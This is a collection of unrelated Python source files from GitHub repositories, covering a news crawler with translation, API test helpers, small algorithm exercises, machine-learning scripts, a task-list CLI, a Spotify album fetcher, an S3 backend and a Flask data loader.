dic['OriginalUrl'] + link\r\n        if link in seenLink:\r\n            w.Scrolledtext1.insert(tkinter.END,\"Skipping already crawled \" + link + \"\\n\")\r\n            w.Scrolledtext1.update()\r\n            continue\r\n        else:\r\n            seenLink.append(link)\r\n        html = getHTMLText(link)\r\n        selector = etree.HTML(html)\r\n        title = selector.xpath(dic['titleXpath'])\r\n        if title:\r\n            w.Scrolledtext1.insert(tkinter.END,\"Crawling: \" + title[0] + \"\\n\")\r\n            w.Scrolledtext1.update()\r\n        else:\r\n            title = 'Untitled'\r\n        time = selector.xpath(dic['timeXpath'])\r\n        author = dic['sitename']\r\n        paras = selector.xpath(dic['contentXpath'])\r\n        # store each crawled article as a dictionary\r\n        article = {\r\n            'Title' : str(title).replace(\"'\",\" \").replace('\"',\" \").replace(\"xa0\",\" \"),\r\n            'Link' : str(link),\r\n            'Time' : str(time).replace(\"'\",\" \").replace('\"',\" \"),\r\n            'Paragraph' : str(paras).replace(\"'\",\" \").replace('\"',\" \").replace(\"\\\\\",\" \").replace(\"xa0\",\" \"),\r\n            'Author' : str(author).replace(\"'\",\" \").replace('\"',\" \")\r\n        }\r\n        if len(article['Paragraph']) > 10: # only keep articles whose body is longer than 10 characters\r\n            articles.append(article)\r\n    with open(\"seen.json\",'w') as seen:\r\n        json.dump(seenLink,seen)\r\n    return articles\r\n\r\ndef IOarticle(articles,w, isTransla=True):  # default assumed so main() can call without the flag\r\n    nowTime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')\r\n    filename = \"result\\\\\" + nowTime + \".md\"\r\n    fo = open(filename, \"w+\", encoding=\"utf-8\")\r\n    for article in articles:\r\n        fo.writelines(\"# \"+ article['Title'] + \"\\r\\n\")\r\n        if isTransla:\r\n            t = GoogleTransla.translateGoogle(article['Title'])\r\n            fo.writelines(\"**Reference translation:** \" + t + \"\\r\\n\")\r\n            w.Scrolledtext1.insert(tkinter.END, \"Translating \" + t + \"\\r\\n\")\r\n            w.Scrolledtext1.update()\r\n        fo.writelines(\"**Source:** \" + article['Link'] + \"\\r\\n\")\r\n        fo.writelines(article['Time'].strip() + \"\\r\\n\")\r\n        if isTransla:\r\n            fo.writelines(GoogleTransla.translateGoogle(article['Time'].strip().replace(\"'\",\" \").replace('\"',\" \"))+ \"\\r\\n\")\r\n        fo.writelines(\"**Body:** \" + article['Paragraph'] + \"\\r\\n\")\r\n        if isTransla:\r\n            try:\r\n                fo.writelines(\"**Reference translation:** \" + GoogleTransla.translateGoogle(article['Paragraph'].replace(\"'\",\" \").replace('\"',\" \") + \"\\n\"))\r\n            except:\r\n                fo.writelines(\"Text too long; only the first 10000 characters are translated for now\\r\\n\")\r\n                fo.writelines(\"**Reference translation:** \" + GoogleTransla.translateGoogle(\r\n                    article['Paragraph'][:10000].replace(\"'\", \" \").replace('\"', \" \") + \"\\r\\n\"))\r\n        fo.writelines(\"\\n **Source site:** \" + article['Author'] + \"\\r\\n\")\r\n        fo.writelines(\"\\r\\n\\n\\n\")\r\n    fo.writelines(\"This file was generated at \" + datetime.datetime.now().strftime('%Y%m%d %H:%M:%S') )\r\n    fo.close()\r\n    w.Scrolledtext1.insert(tkinter.END, \"Crawl output file generated; look in the result directory\\r\\n\")\r\n    w.Scrolledtext1.update()\r\n    with open(\"text.json\",\"w\") as text:\r\n        json.dump(articles,text)\r\n    return filename\r\n\r\ndef mdTohtmldoc(filename,isDOC,isHTML):\r\n    if isDOC:\r\n        output = pypandoc.convert_file(filename,'docx',format='md',outputfile=filename[:-3]+\".docx\")\r\n    if isHTML:\r\n        output = pypandoc.convert_file(filename,'html',format='md',outputfile=filename[:-3]+\".html\",extra_args=[\"--ascii\"])\r\n\r\ndef main(w):\r\n    articles = []\r\n    with open(\"siteconfig.json\") as site:\r\n        webs = json.load(site)\r\n    for web in webs:\r\n        articles = getContent(web,articles,w);\r\n    filename = IOarticle(articles,w)\r\n    SendEmail.send_mail(filename,filename,w)\r\n    # 
getWHList(keyWord=\"china\")\r\n\r\n","repo_name":"javawilder/TranslaApp","sub_path":"CrawlWeb.py","file_name":"CrawlWeb.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72408636359","text":"import collections\nimport os\nimport re\nfrom unittest import TestCase\n\nimport httpretty\nfrom requests_toolbelt.multipart import decoder\n\nDATA_TEST_BASE = os.path.join(os.path.dirname(__file__), \"test_data\", \"api\")\n\n\nclass ResponseHandler(object):\n \"\"\"httpretty response handler.\"\"\"\n\n def __init__(self, body, filename, auth=False):\n \"\"\"Construct response handler object.\"\"\"\n self.body = body\n self.filename = filename\n self.auth = auth\n\n def __call__(self, request, uri, headers):\n \"\"\"Call interface for httpretty.\"\"\"\n if self.auth and request.headers[\"Authorization\"] != \"Token KEY\":\n return 403, headers, \"\"\n\n content = self.get_content(request)\n\n return 200, headers, content\n\n def get_content(self, request):\n \"\"\"Return content for given request.\"\"\"\n filename = self.get_filename(request)\n\n if filename is not None:\n with open(filename, \"rb\") as handle:\n return handle.read()\n\n return self.body\n\n def get_filename(self, request):\n \"\"\"Return filename for given request.\"\"\"\n if request.method != \"GET\":\n content_type = request.headers.get(\"content-type\", None)\n\n if content_type is not None and content_type.startswith(\n \"multipart/form-data\"\n ):\n return self.get_multipart_filename(content_type, request)\n else:\n return \"--\".join(\n (self.filename, request.method, request.body.decode(\"ascii\"))\n )\n elif \"?\" in request.path:\n return \"--\".join(\n (self.filename, request.method, request.path.split(\"?\", 1)[-1])\n )\n return None\n\n def get_multipart_filename(self, content_type, request):\n \"\"\"Return filename for given multipart request.\"\"\"\n body = request.body\n multipart_data = decoder.MultipartDecoder(body, content_type)\n multipart_dict = {}\n filename_array = [self.filename, request.method]\n for part in multipart_data.parts:\n content_disposition = part.headers.get(\"Content-Disposition\".encode(), None)\n\n decoded_cd = content_disposition.decode(\"utf-8\")\n multipart_name = self.get_multipart_name(decoded_cd)\n\n multipart_dict[multipart_name] = part.text.replace(\" \", \"-\")\n\n ordered_dict = collections.OrderedDict(sorted(multipart_dict.items()))\n\n for key, value in ordered_dict.items():\n filename_array.append(key + \"=\" + value)\n return \"--\".join(filename_array)\n\n # simple implementation instead of one based on the rfc6266 parser,\n # as rfc6266 fails on python 3.7\n @staticmethod\n def get_multipart_name(content_disposition):\n \"\"\"Return multipart name from content disposition.\"\"\"\n m = re.search(r'name\\s*=\\s*\"(?P[A-Za-z]+)\"', content_disposition)\n\n return m.group(\"name\")\n\n\ndef register_uri(path, domain=\"http://127.0.0.1:8000/api\", auth=False):\n \"\"\"Simplified URL registration.\"\"\"\n filename = os.path.join(DATA_TEST_BASE, path.replace(\"/\", \"-\"))\n url = \"/\".join((domain, path, \"\"))\n with open(filename, \"rb\") as handle:\n httpretty.register_uri(\n httpretty.GET,\n url,\n body=ResponseHandler(handle.read(), filename, auth),\n content_type=\"application/json\",\n )\n httpretty.register_uri(\n httpretty.POST,\n url,\n body=ResponseHandler(handle.read(), filename, auth),\n content_type=\"application/json\",\n )\n httpretty.register_uri(\n 
httpretty.DELETE,\n url,\n body=ResponseHandler(handle.read(), filename, auth),\n content_type=\"application/json\",\n )\n\n\ndef raise_error(request, uri, headers):\n \"\"\"Raise IOError.\"\"\"\n # pylint: disable=W0613\n raise IOError(\"Some error\")\n\n\ndef register_error(path, code, domain=\"http://127.0.0.1:8000/api\", body=None):\n \"\"\"Simplified URL error registration.\"\"\"\n url = \"/\".join((domain, path, \"\"))\n httpretty.register_uri(httpretty.GET, url, body=body, status=code)\n\n\ndef register_uris():\n \"\"\"Register URIs for httpretty.\"\"\"\n paths = (\n \"changes\",\n \"projects\",\n \"components\",\n \"translations\",\n \"projects/hello\",\n \"projects/hello/changes\",\n \"projects/hello/components\",\n \"projects/hello/statistics\",\n \"projects/hello/languages\",\n \"projects/empty\",\n \"projects/empty/components\",\n \"projects/invalid\",\n \"components/hello/weblate\",\n \"components/hello/android\",\n \"translations/hello/weblate/cs\",\n \"projects/hello/repository\",\n \"components/hello/weblate/repository\",\n \"components/hello/weblate/changes\",\n \"translations/hello/weblate/cs/file\",\n \"translations/hello/weblate/cs/repository\",\n \"translations/hello/weblate/cs/changes\",\n \"components/hello/weblate/statistics\",\n \"translations/hello/weblate/cs/statistics\",\n \"components/hello/weblate/translations\",\n \"components/hello/weblate/lock\",\n \"languages\",\n )\n for path in paths:\n register_uri(path)\n\n register_uri(\"projects/acl\", auth=True)\n\n register_uri(\"projects\", domain=\"https://example.net\")\n register_error(\"projects/nonexisting\", 404)\n register_error(\"projects/denied\", 403)\n register_error(\"projects/throttled\", 429)\n register_error(\"projects/error\", 500)\n register_error(\"projects/io\", 500, body=raise_error)\n\n\nclass APITest(TestCase):\n \"\"\"Base class for API testing.\"\"\"\n\n def setUp(self):\n \"\"\"Enable httpretty and register urls.\"\"\"\n httpretty.enable()\n register_uris()\n\n def tearDown(self):\n \"\"\"Disable httpretty.\"\"\"\n httpretty.disable()\n httpretty.reset()\n","repo_name":"bopopescu/amlak","sub_path":"venv/Lib/site-packages/wlc/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":5893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"20183830156","text":"\ndef search_help(arr, low, high, x, position='f'):\n '''\n position: f - first or l - last\n '''\n\n if high >= low:\n mid = (high + low) // 2\n\n if position == 'f' and arr[mid] == x and (mid == 0 or x > arr[mid-1]):\n return mid\n\n if position == 'l' and arr[mid] == x and (mid == high or x < arr[mid+1]):\n return mid\n\n if (position == 'f' and arr[mid] >= x) or (position == 'l' and arr[mid] > x):\n return search_help(arr, low, mid - 1, x, position=position)\n else:\n return search_help(arr, mid + 1, high, x, position=position)\n\n else:\n return -1\n\n\ndef search(arr, low, high, x):\n return (search_help(arr, 0, len(arr)-1, x, 'f'), search_help(arr, 0, len(arr)-1, x, 'l'))\n\n\nif __name__ == '__main__':\n nums = [5, 7, 7, 8, 8, 10]\n print(search(nums, 0, len(nums)-1, 8))\n\n nums = [5, 7, 7, 8, 8, 10]\n print(search(nums, 0, len(nums)-1, 6))\n\n nums = [5, 7, 8, 8, 10]\n print(search(nums, 0, len(nums)-1, 5))\n","repo_name":"SashaKryzh/KPI","sub_path":"1-й курс/Проектирование алгоритмов - РГР/Бінарний 
пошук/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"21749439896","text":"#pip install -U scikit-learn scipy matplotlib\r\n#pip install numpy \r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\nfrom sklearn.preprocessing import QuantileTransformer\r\n\r\ndf=pd.read_csv(\".\\diabetes.csv\")\r\ndf=df.drop_duplicates()\r\n\r\ndf['Glucose']=df['Glucose'].replace(0,df['Glucose'].mean())#normal distribution\r\ndf['SkinThickness']=df['SkinThickness'].replace(0,df['SkinThickness'].median())#skewed distribution\r\ndf['BMI']=df['BMI'].replace(0,df['BMI'].median())#skewed distribution\r\n\r\ndf_selected=df.drop(['BloodPressure','Insulin','DiabetesPedigreeFunction',],axis='columns')\r\n\r\ntarget_name='Outcome'\r\ny= df_selected[target_name]#given predictions - training data \r\nX= df_selected.drop(target_name,axis=1)#dropping the Outcome column and keeping all other columns as X\r\n\r\nname_dict = {'Pregnancies':['6'],\t'Glucose':['148'],\t'SkinThickness':['35'],\t'BMI':['33.6'],\t'Age':['50']}\r\nnew_data_df=pd.DataFrame(name_dict)\r\nnew_df = pd.concat([df_selected, new_data_df], axis = 0, join ='inner')\r\n\r\n\r\nx=new_df\r\nquantile = QuantileTransformer()\r\nX = quantile.fit_transform(x)\r\ndf_new=quantile.transform(X)\r\ndf_new=pd.DataFrame(X)\r\ndf_new.columns =['Pregnancies', 'Glucose','SkinThickness','BMI','Age']\r\n\r\n\r\nalist = (df_new.tail(1)).values.tolist()\r\nfor i in alist:\r\n print(i)\r\n input_data = tuple(i)\r\n\r\n\r\n# loading the saved model\r\nloaded_model = pickle.load(open('diabetes_model.sav', 'rb'))\r\n\r\n# changing the input_data to numpy array\r\ninput_data_as_numpy_array = np.asarray(input_data)\r\nprint(\"INP data numpy\", input_data_as_numpy_array)\r\n\r\n# reshape the array as we are predicting for one instance\r\ninput_data_reshaped = input_data_as_numpy_array.reshape(1,-1)\r\nprint(\"input data reshaped\", input_data_reshaped)\r\n\r\nprediction = loaded_model.predict(input_data_reshaped)\r\n#prediction by voting classifier model.\r\nprint(prediction)\r\n\r\nif (prediction[0] == 0):\r\n print('The person is not diabetic')\r\nelse:\r\n print('The person is diabetic')\r\n","repo_name":"sumaaan/Diabetes-Predection-using-Ensemble-Learning","sub_path":"predectivesystem.py","file_name":"predectivesystem.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"2265425581","text":"import numpy as np\n\ndef dose(Gy,mean_energy_dep):\n eV=1.60218e-19 # ev to Joule\n volume = 1.161e-5#1.161e-5 # mass of volume in kg -> 1.161e-5: cell nucleus volume -> 1.131e-13\n deposit2Joule = eV*mean_energy_dep\n numberProt = Gy*volume/deposit2Joule\n print(numberProt)\n return int(numberProt)\n\n\nif __name__=='__main__': # test function\n print(dose(np.array([1,2,3,5,8,10]),75369))\n","repo_name":"JohannesTjeltaMaster/PythonMC","sub_path":"src1/Dose.py","file_name":"Dose.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6734954576","text":"import numpy as np\nimport tensorflow as tf\ntfkl = tf.keras.layers\n\n\nclass FourierFeature(tfkl.Layer):\n def __init__(self, units=128, preset=True):\n super(FourierFeature, self).__init__()\n self.PI = tf.constant(np.pi, dtype=tf.float32)\n if preset:\n self.B = tf.constant(10.*np.random.randn(2, 
units), dtype=tf.float32)\n        else:\n            self.B = self.add_weight(shape=(2, units), initializer=tf.keras.initializers.RandomUniform(-15.0, 15.0), dtype=tf.float32, trainable=True)\n\n    def call(self, x):\n        proj = tf.matmul((2*self.PI*x), self.B)\n        return tf.concat([tf.sin(proj), tf.cos(proj)], axis=-1)\n\n\nclass Generator(tf.keras.Model):\n    def __init__(self, n_layers=4, units=128, dim=256, preset=True):\n        super(Generator, self).__init__()\n        self.rff = FourierFeature(units, preset)\n        self.denses = []\n        for i in range(n_layers):\n            self.denses.append(tfkl.Dense(dim, activation='relu'))\n        self.final = tfkl.Dense(3, activation='sigmoid')\n\n    def call(self, x, use_B=True):\n        if use_B:\n            x = self.rff(x)\n        for dense in self.denses:\n            x = dense(x)\n        return self.final(x)","repo_name":"gdao-research/FourierFeatureMapping","sub_path":"rff/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34309472142","text":"import os\nimport pathlib\nimport json\nimport tempfile\n\nfrom redcap_bridge.project_building import build_project, customize_project\nfrom redcap_bridge.project_validation import validate_project_against_template_parts\nfrom redcap_bridge.server_interface import (upload_datadict, download_records,\n                                            check_external_modules)\n\ndef setup_project(proj_folder, working_dir=None, include_provenance=True):\n    \"\"\"\n    Build a project csv from its specifications and setup on the server\n\n    Parameters\n    ----------\n    proj_folder: (path)\n        folder containing the project specification files `project.json`,\n        `structure.csv` and `customizations.csv`\n    working_dir: (path)\n        directory in which to store temporarily generated project files\n    include_provenance: (bool)\n        include hidden provenance information in project csv.\n        Default: True\n    \"\"\"\n\n    if working_dir is None:\n        working_dir = tempfile.TemporaryDirectory(prefix='redcap_bridge_').name\n\n    working_dir = pathlib.Path(working_dir)\n    proj_folder = pathlib.Path(proj_folder)\n\n    if not working_dir.exists():\n        os.mkdir(working_dir)\n\n    with open(proj_folder / 'project.json') as f:\n        proj_conf = json.load(f)\n\n    build_project(proj_folder / 'structure.csv', working_dir / 'build.csv',\n                  include_provenance=include_provenance)\n    customize_project(working_dir / 'build.csv',\n                      proj_folder / 'customizations.csv',\n                      output_file=working_dir / 'customized.csv')\n    validate_project_against_template_parts(working_dir / 'customized.csv',\n                                            *proj_conf['validation'])\n    check_external_modules(proj_folder / 'project.json')\n\n    upload_datadict(working_dir / 'customized.csv', proj_folder / 'project.json')\n","repo_name":"INT-NIT/DigLabTools","sub_path":"redcap_bridge/project_control.py","file_name":"project_control.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"32799004870","text":"#!/usr/bin/python3\n\"\"\" A script that returns Pascal's triangle for a given n\"\"\"\n\n\ndef pascal_triangle(n):\n    \"\"\"A function that returns Pascal's triangle with n rows\"\"\"\n    outterList = []\n\n    for eachRow in range(n):\n        # initializing the inner list that represents 
the columns\n        innerList = []\n        for eachCol in range(eachRow + 1):\n            if eachCol == 0 or eachCol == eachRow:\n                innerList.append(1)\n            else:\n                innerList.append(\n                    outterList[eachRow - 1][eachCol - 1] +\n                    outterList[eachRow - 1][eachCol])\n        outterList.append(innerList)\n    return (outterList)\n","repo_name":"cgrade/alx-interview","sub_path":"0x00-pascal_triangle/0-pascal_triangle.py","file_name":"0-pascal_triangle.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22421990923","text":"\"\"\"Module containing the methods relating to task creation.\"\"\"\n\nfrom pypika import Query, Table\nfrom rich.markup import escape\n\nfrom next_task.interface.console_output import Style, TaskTable\n\nfrom .database import Database\n\nconsole = Style().console()\n\n\nclass CreateTask:\n    \"\"\"Create a task.\"\"\"\n\n    def __init__(self, task_summary):\n        \"\"\"Instantiate the class.\"\"\"\n        task = Table('task')\n        query = Query.into(task).columns('summary')\n        new_task = Database().write(str(query.insert(task_summary)))\n        console.print(f\"[info][b]Created Task {new_task}:[/b][/info]\",\n                      f\"[highlight]{escape(task_summary)}[/highlight]\")\n\n\nclass GetNextTask:\n    \"\"\"Return the next task in the task db.\"\"\"\n\n    def __init__(self):\n        \"\"\"Instantiate the class.\"\"\"\n        query = \"SELECT task_id, summary FROM task_list LIMIT 1;\"\n        self.task = Database().read(str(query))\n\n    def print(self):\n        \"\"\"Print the task to the console.\"\"\"\n        if self.confirm_next_task():\n            id = self.task[0]['task_id']\n            summary = self.task[0]['summary']\n            console.print(f\"[info][b]{id}: [/b][/info]{escape(summary)}\",\n                          style=\"highlight\")\n        else:\n            console.print(\"[green][b]Congratulations![/b] \"\n                          \"There are no more tasks on your task list\\n\"\n                          \"Take a break and have a cup of tea.[/green]\")\n\n    def confirm_next_task(self):\n        \"\"\"Confirm that there is a task.\"\"\"\n        if self.task:\n            return True\n        return False\n\n\nclass SkipTask:\n    \"\"\"Skip the next task.\"\"\"\n\n    def __init__(self):\n        \"\"\"Instantiate the class.\"\"\"\n        task_skips = Table(\"task_skips\")\n        query = Query.into(task_skips).columns(\"task_id\")\n        task = GetNextTask()\n        if task.confirm_next_task():\n            id = task.task[0]['task_id']\n            Database().write(str(query.insert(id)))\n            console.print(f\"[info][i]Skipped Task {id}[/i][/info]\")\n            GetNextTask().print()\n            return\n        task.print()\n\n\nclass CloseTask:\n    \"\"\"Close a task.\"\"\"\n\n    def __init__(self):\n        \"\"\"Instantiate the class.\"\"\"\n        task_status = Table('task_status')\n        query = Query.into(task_status).columns(\"task_id\", \"t_status\")\n        task = GetNextTask()\n        if task.confirm_next_task():\n            task_id = task.task[0]['task_id']\n            task_summary = task.task[0]['summary']\n            Database().write(str(query.insert(task_id, \"closed\")))\n            console.print(f\"[green]Closed {task_id}: {task_summary}[/green]\")\n            GetNextTask().print()\n            return\n        task.print()\n\n\nclass ListTasks:\n    \"\"\"List the open tasks.\"\"\"\n\n    def __init__(self):\n        \"\"\"Instantiate the class.\"\"\"\n        self.data = Database().read(\"SELECT * FROM task_list;\")\n        TaskTable(self.data)\n","repo_name":"MakeJames/Next-Task","sub_path":"next_task/services/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"33257550338","text":"import csv\nimport json\nimport apiconfig\nimport spotipy\nfrom spotipy.oauth2 import 
SpotifyClientCredentials\n\nedge_cases = {\n ('Slum Village', 'Fantastic, Vol.\\u00a02'): {\n 'album_url': 'https://open.spotify.com/album/22IhsI5JpldSrE7vhidAja',\n 'image_url': 'https://i.scdn.co/image/ab67616d0000b2733999c60eca1a87fd7e7868bc'\n },\n ('Todd Edwards', 'Prima Edizione'): {\n 'album_url': 'https://open.spotify.com/album/6SRbCAQ1zu2r47Bi771rAs',\n 'image_url': 'primaedizione.jpg'\n },\n ('KNOWER', 'KNOWER FOREVER'): {\n 'album_url': '',\n 'image_url': 'knowerforever.jpg'\n }\n} \n\nclient_credentials_manager = SpotifyClientCredentials(client_id=apiconfig.CLIENT_ID, client_secret=apiconfig.CLIENT_SECRET)\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n\ndef get_album_urls(artist, album):\n \"\"\" \n Use Spotify API to search \"[artist] [album]\" and return the album URL and image URL\n \"\"\"\n results = sp.search(f'{artist} {album}', type='album', limit=1)\n items = results['albums']['items']\n if len(items) == 0:\n return '', ''\n item = items[0]\n\n album_url = ''\n image_url = ''\n\n urls = item['external_urls']\n album_url = urls['spotify']\n\n images = item['images']\n if len(images) > 0:\n image_url = images[0]['url']\n \n return album_url, image_url \n\ndef read_albums_from_csv(csv_file, json_file=None):\n \"\"\"\n Read albums from CSV file, optionally preserving the data from the JSON file\n \"\"\"\n if json_file:\n with open(json_file, 'r') as f:\n json_data = json.load(f)\n albums_in_json = {}\n for album in json_data:\n albums_in_json[album[\"artist\"], album[\"title\"]] = album\n \n with open(csv_file) as f:\n reader = csv.reader(f)\n albums = []\n for row in reader:\n album, artist, year, descriptors, song1, song2, date_added = row\n\n album = album.replace('Vol. ', 'Vol.\\u00A0')\n\n if album == 'Album' and artist == 'Artist':\n continue\n \n if (artist, album) in albums_in_json:\n album_url = albums_in_json[artist, album]['album_url']\n image_url = albums_in_json[artist, album]['image_url']\n elif (artist, album) in edge_cases:\n album_url, image_url = edge_cases[artist, album]['album_url'], edge_cases[artist, album]['image_url']\n else:\n album_url, image_url = get_album_urls(artist, album)\n\n albums.append({\n \"title\": album,\n \"artist\": artist,\n \"year\": year,\n \"descriptors\": descriptors.split(', '),\n \"tracks\": [song1, song2],\n \"album_url\": album_url,\n \"image_url\": image_url,\n \"date_added\": date_added\n })\n \n return albums\n\nalbums = read_albums_from_csv('full-moon-albums.csv', 'full-moon-albums.json')\n\n# write albums to JSON\nwith open('full-moon-albums.json', 'w') as f:\n json.dump(albums, f, indent=4)","repo_name":"adamaaronson/full-moon-albums","sub_path":"src/data/process-albums.py","file_name":"process-albums.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"25241479378","text":"import boto3\nimport botocore.exceptions\n\nfrom .backend import FileBackend\nfrom .exceptions import BackendException, BackendInitException\n\n\nclass S3Backend(FileBackend):\n backend = \"s3\"\n\n def __init__(self, config: dict):\n try:\n self.aws_access_key_id = config[\"s3\"][\"aws_access_key_id\"]\n self.aws_secret_access_key = config[\"s3\"][\"aws_secret_access_key\"]\n self.aws_storage_bucket_name = config[\"s3\"][\"aws_storage_bucket_name\"]\n except KeyError:\n raise BackendInitException(\"the S3 backend requires 'aws_access_key_id', 'aws_secret_access_key', \"\n \"and 'aws_storage_bucket_name' in the 's3' 
key of the JSON POST body.\")\n try:\n self.client = boto3.client(\n \"s3\",\n aws_access_key_id=self.aws_access_key_id,\n aws_secret_access_key=self.aws_secret_access_key,\n )\n except Exception as e:\n raise BackendInitException(f\"failed to initialize AWS client: {str(e)}\")\n\n def get_file(self, uri: str) -> bytes:\n try:\n obj = self.client.get_object(Bucket=self.aws_storage_bucket_name, Key=uri)\n return obj[\"Body\"].read()\n except botocore.exceptions.ClientError as e:\n raise BackendException(f\"S3 client error: {str(e)}\")\n except Exception as e:\n raise BackendException(f\"the read operation unexpectedly failed: {str(e)}\")\n","repo_name":"Enterprise-CMCS/cmcs-eregulations","sub_path":"solution/text-extractor/backends/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"63"} +{"seq_id":"2571133165","text":"from typing import List\nimport numpy as np\nfrom app.helpers.cluster.base_cluster import ClusterObject, ClusterService\n\n\nclass ThesisClusterObject(ClusterObject):\n title_vector: list\n category_vector: list\n expected_result_vector: list\n problem_solve_vector: list\n\ndef multiply_array(input: list, multiplier: float):\n result = []\n for item in input:\n result.append(item * multiplier)\n return result\n\ndef get_medium_array(input: list, total_uik: float):\n result = np.zeros_like(input[0])\n\n for item in input:\n result += np.array(item)\n \n result /= total_uik\n return result.tolist()\n\n\nclass ThesisClusterService(ClusterService):\n def __init__(self, field_weights, field_balance_multipliers):\n self.field_weights = field_weights\n self.field_balance_multipliers = field_balance_multipliers\n\n def get_distance_between_two_object(self, first_object: ThesisClusterObject, second_object: ThesisClusterObject) -> float:\n dis1 = np.linalg.norm(np.array(first_object.title_vector) - np.array(second_object.title_vector)) * self.field_weights[0] * self.field_balance_multipliers[0]\n dis2 = np.linalg.norm(np.array(first_object.category_vector) - np.array(second_object.category_vector)) * self.field_weights[1] * self.field_balance_multipliers[1]\n dis3 = np.linalg.norm(np.array(first_object.expected_result_vector) - np.array(second_object.expected_result_vector)) * self.field_weights[2] * self.field_balance_multipliers[2]\n dis4 = np.linalg.norm(np.array(first_object.problem_solve_vector) - np.array(second_object.problem_solve_vector)) * self.field_weights[3] * self.field_balance_multipliers[3]\n return dis1 + dis2 + dis3 + dis4\n \n def calculate_centroid_from_list_and_uik(self, uik_pow: list, data: List[ThesisClusterObject]) -> ThesisClusterObject:\n list_title = [multiply_array(item.title_vector, uik) for uik, item in zip(uik_pow, data)]\n list_category = [multiply_array(item.category_vector, uik) for uik, item in zip(uik_pow, data)]\n list_expected = [multiply_array(item.expected_result_vector, uik) for uik, item in zip(uik_pow, data)]\n list_problem = [multiply_array(item.problem_solve_vector, uik) for uik, item in zip(uik_pow, data)]\n \n total_uik = sum(uik_pow)\n new_centroid = ThesisClusterObject(\n title_vector=get_medium_array(list_title, total_uik),\n category_vector=get_medium_array(list_category, total_uik),\n expected_result_vector=get_medium_array(list_expected, total_uik),\n problem_solve_vector=get_medium_array(list_problem, total_uik)\n )\n return 
new_centroid","repo_name":"tienbaovuong/algo-clustering-server","sub_path":"app/worker/thesis_cluster_class.py","file_name":"thesis_cluster_class.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1304140629","text":"#!/usr/bin/python3\n\"\"\"Module listing the title of top 10 hot post in the subreddit\"\"\"\nimport requests\n\n\ndef top_ten(subreddit):\n    \"\"\"list the title of top 10 hot post in the subreddit\"\"\"\n    url = f'https://www.reddit.com/r/{subreddit}/hot.json?limit=10'\n    user = {'User-Agent': 'Test123'}\n    response = requests.get(url, headers=user, allow_redirects=False)\n    if response.status_code == 404:\n        print('None')\n        return\n    for post in response.json().get('data').get('children'):\n        print(post.get('data').get('title'))\n","repo_name":"adut24/holbertonschool-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22630089323","text":"\r\n\r\n# ---------------------------------------------file rename and copy\r\nimport os,glob, datetime\r\n\r\nname = ('')\r\nCurrent_Date = datetime.datetime.today().strftime('%Y_%m_%d' + '_' + name)\r\nprint(Current_Date)\r\nsrc = Current_Date\r\nos.chdir('C:/GDSRC/Data/')\r\n\r\nfor file in os.listdir():\r\n    print(file)\r\n    if file.startswith('지디스'):\r\n        print(file)\r\n        os.rename(file, 'C:/GDSRC/Data/' + src + 'Labgen.xls')\r\n\r\n","repo_name":"MigoJJ/RoutineCheck","sub_path":"A_File_Control/Excel/Labgen_Rename_Copy.py","file_name":"Labgen_Rename_Copy.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29197353187","text":"filename = 'encrypt_file'\nmessage = input('Enter your Message: ')\nkey = int(input('Enter the Key value: '))\n\ndef encrypt(fname,msg, key): \n    with open(fname,'w') as f:\n        for ch in msg:\n            f.write(chr(ord(ch) + key ))\n    \n\ndef decrypt(fname, key):\n    org_msg = ''\n    with open(fname,'r') as f:\n        msg = f.read()\n        for ch in msg:\n            org_msg += chr(ord(ch) - key )\n    with open(f.name + '_decrypt', 'w') as fw:\n        fw.write(org_msg)\n    \n    \n    \nencrypt(filename,message, key)\ndecrypt(filename, key)\n# print(org_message)","repo_name":"m-bastam/python_class","sub_path":"Files_sample.py","file_name":"Files_sample.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"5527693331","text":"import json\r\nfrom models import *\r\nfrom config import db\r\n\r\n\r\ndef insert_data_users(input_data):\r\n    # populate the User table\r\n    for row in input_data:\r\n        db.session.add(\r\n            User(\r\n                id=row.get(\"id\"),\r\n                first_name=row.get(\"first_name\"),\r\n                last_name=row.get(\"last_name\"),\r\n                age=row.get(\"age\"),\r\n                